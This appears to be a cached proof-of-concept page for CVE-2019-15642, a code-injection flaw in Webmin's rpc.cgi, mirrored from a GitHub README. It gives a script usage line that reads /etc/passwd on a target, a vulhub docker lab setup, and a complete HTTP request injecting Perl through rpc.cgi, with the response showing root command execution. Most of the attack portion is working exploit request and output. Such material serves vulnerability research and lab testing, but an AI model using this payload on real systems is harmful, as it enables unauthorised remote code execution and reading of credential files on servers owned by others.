Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-15642 PoC — Webmin 代码注入漏洞

Source
https://github.com/jas502n/CVE-2019-15642
Associated Vulnerability
Title:Webmin 代码注入漏洞 (CVE-2019-15642)
Description:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。
Description
Webmin Remote Code Execution (authenticated)
Readme
# CVE-2019-15642 Webmin Remote Code Execution (authenticated) 

## python Usage:

`python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"`

![](./CVE-2019-15642.jpg)

![](./CVE-2019-15642.png)

## 0x01 docker for Webmin
`cd ~/vulhub/webmin/CVE-2019-15107`

`docker-compose up -d`

`root@9460493fa985:/# passwd root`

#### Webmin > username=root,password=root

```
 ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d
Creating network "cve-2019-15107_default" with the default driver
Pulling web (vulhub/webmin:1.910)...
1.910: Pulling from vulhub/webmin
db0035920883: Pull complete
d3665f2ef942: Pull complete
08a7da7cdc97: Pull complete
059181cc3fe2: Pull complete
Digest: sha256:ea48cb0e1393fe0247f910c039aa143bbdd74eaecadc44fbe68d2f7e86e037b3
Status: Downloaded newer image for vulhub/webmin:1.910
Creating cve-2019-15107_web_1 ... done

 ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker ps -a
CONTAINER ID        IMAGE                         COMMAND                  CREATED             STATUS              PORTS                      NAMES
9460493fa985        vulhub/webmin:1.910           "/docker-entrypoin..."   14 minutes ago      Up 14 minutes       0.0.0.0:10000->10000/tcp   cve-2019-15107_web_1

 ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker exec -it 9460493fa985 /bin/bash
root@9460493fa985:/# ls

root@9460493fa985:/# passwd root
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@9460493fa985:/# 


```


## 0x02 login for Webmin
```
username=root
password=root
>>>Authorization: Basic cm9vdDpyb290
```

![](./webmin.png)
![](./rpc.png)

## 0x03 Command Execute Burpsuite

### Burp Request
```
POST /rpc.cgi HTTP/1.1
Host: hk.canyouseeme.cc:10000
User-Agent: webmin
Connection: close
Content-Type: application/x-www-form-urlencoded
Authorization: Basic cm9vdDpyb290
Content-Length: 70

OBJECT CGI;print "Content-Type: Jas502n\n\n\n";$cmd=`id`;print "$cmd";
```

### Burp Response
```
HTTP/1.0 200 Document follows
Date: Sun, 1 Sep 2019 09:35:24 GMT
Server: MiniServ/1.910
Connection: close
Content-Type: Jas502n


uid=0(root) gid=0(root) groups=0(root)
Content-type: text/plain


```


## 参考链接

https://twitter.com/chybeta/status/1167617571287289856

https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
File Snapshot

 [4.0K]  /data/pocs/bb35e95171f6369df6be30ec1f5832836adf90bc
├── [115K]  CVE-2019-15642.jpg
├── [105K]  CVE-2019-15642.png
├── [2.2K]  CVE-2019-15642.py
├── [2.3K]  README.md
├── [ 95K]  rpc.png
└── [191K]  webmin.png

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.